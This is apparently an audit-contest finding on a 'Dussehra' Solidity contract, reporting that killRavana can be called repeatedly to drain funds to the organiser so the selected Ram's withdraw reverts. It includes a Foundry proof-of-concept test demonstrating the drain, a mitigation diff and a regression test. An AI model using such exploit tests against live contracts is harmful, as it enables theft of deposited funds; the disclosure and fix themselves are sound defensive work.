Beginner Friendly / Foundry / NFT
100 EXP
Submission Details
Severity: medium
Valid

The `Dussehra::withdraw` function will always revert and Ram can't withdraw his reward


Description:

As mentioned previously, the `Dussehra::killRavana` function has a vulnerability that lets the organiser end up with all of the protocol's money, because the function can be called multiple times and each call pays the organiser again. This makes the `Dussehra::withdraw` function useless: the contract is left empty, so the chosen Ram can't withdraw his reward.

Impact:

  • The chosen Ram is unable to withdraw his entitled reward due to the function always reverting. This defeats the purpose of the reward mechanism and leaves the reward funds inaccessible.

Proof of Concept:

  • Use the following PoC in `Dussehra.t.sol` (it relies on the test file's `participants` modifier, which enrols two users paying an entrance fee of 1e18 each):

```solidity
function test_MaliciousOrganizerOrMultipleKillRavanaCall() public participants {
    // `participants` modifier enters 2 users with a fee of 1e18 for every user
    // 1. Choose Ram
    vm.warp(1728691200 + 1);
    vm.startPrank(organiser);
    choosingRam.selectRamIfNotSelected();
    address selectedRam = choosingRam.selectedRam();
    vm.stopPrank();

    // 2. Call killRavana multiple times
    uint256 organiserInitialBalance = address(organiser).balance; // 0
    uint256 dussehraInitialBalance = address(dussehra).balance; // 2e18, paid in by the modifier
    vm.startPrank(player1);
    console.log("OrganizerInitialBalance :", address(organiser).balance);
    console.log("DussehraInitialBalance:", address(dussehra).balance);

    // first call
    dussehra.killRavana();
    console.log("OrganizerBalanceAfterFirstCall :", address(organiser).balance);
    console.log("DussehraBalanceAfterFirstCall:", address(dussehra).balance);
    // 50% goes to the organiser and 50% is left for Ram:
    // here 1e18 for the organiser, and the remaining 1e18 stays in the contract for Ram
    assertEq(address(organiser).balance, address(dussehra).balance);

    // second call: another 50% of the total is sent to the organiser, draining the contract
    dussehra.killRavana();
    console.log("OrganizerBalanceAfterSecondCall :", address(organiser).balance);
    console.log("DussehraBalanceAfterSecondCall:", address(dussehra).balance);
    assertEq(address(dussehra).balance, 0);
    assertEq(address(organiser).balance, dussehraInitialBalance + organiserInitialBalance);
    vm.stopPrank();

    // 3. The selected Ram tries to withdraw the reward, but the call reverts
    vm.prank(selectedRam);
    vm.expectRevert();
    dussehra.withdraw();
}
```

Recommended Mitigation:

  • Prevent `killRavana` from being called more than once by reverting when `IsRavanKilled` is already set. This stops the organiser's payout from being repeated and keeps Ram's share in the contract:

```diff
function killRavana() public RamIsSelected {
    if (block.timestamp < 1728691069) {
        revert Dussehra__MahuratIsNotStart();
    }
    if (block.timestamp > 1728777669) {
        revert Dussehra__MahuratIsFinished();
    }
+   // Reject repeated calls; requires `error RavanaIsAlreadyKilled();` declared in the contract
+   if (IsRavanKilled) {
+       revert RavanaIsAlreadyKilled();
+   }
    IsRavanKilled = true;
    uint256 totalAmountByThePeople = WantToBeLikeRam.length * entranceFee;
    totalAmountGivenToRam = (totalAmountByThePeople * 50) / 100;
    (bool success, ) = organiser.call{value: totalAmountGivenToRam}("");
    require(success, "Failed to send money to organiser");
}
```
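A regression test for the mitigated contract, added here as an example and not part of the original submission: it checks that a second `killRavana` call reverts with the new error and that Ram can then withdraw. It reuses the harness names from the PoC above (`participants`, `dussehra`, `choosingRam`, `organiser`, `player1`) and assumes the error is declared as `error RavanaIsAlreadyKilled();` inside `Dussehra`, and that `withdraw` pays the remaining contract balance to the selected Ram with no further precondition at this point.

```solidity
function test_SecondKillRavanaRevertsAndRamCanWithdraw() public participants {
    // Select Ram exactly as in the PoC (harness names assumed from Dussehra.t.sol)
    vm.warp(1728691200 + 1);
    vm.prank(organiser);
    choosingRam.selectRamIfNotSelected();
    address selectedRam = choosingRam.selectedRam();

    uint256 totalFees = address(dussehra).balance; // 2e18 from the `participants` modifier

    // First call: organiser receives 50% of the fees, the other 50% stays for Ram
    vm.prank(player1);
    dussehra.killRavana();
    assertEq(address(organiser).balance, totalFees / 2);
    assertEq(address(dussehra).balance, totalFees / 2);

    // Second call must now revert with the custom error added by the mitigation
    vm.prank(player1);
    vm.expectRevert(Dussehra.RavanaIsAlreadyKilled.selector);
    dussehra.killRavana();

    // Ram's share was not drained, so withdraw succeeds (assumes withdraw pays out the balance)
    uint256 ramBefore = selectedRam.balance;
    vm.prank(selectedRam);
    dussehra.withdraw();
    assertEq(selectedRam.balance, ramBefore + totalFees / 2);
    assertEq(address(dussehra).balance, 0);
}
```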
Updates

Lead Judging Commences

bube (Lead Judge), over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

isRavanKilled is not checked
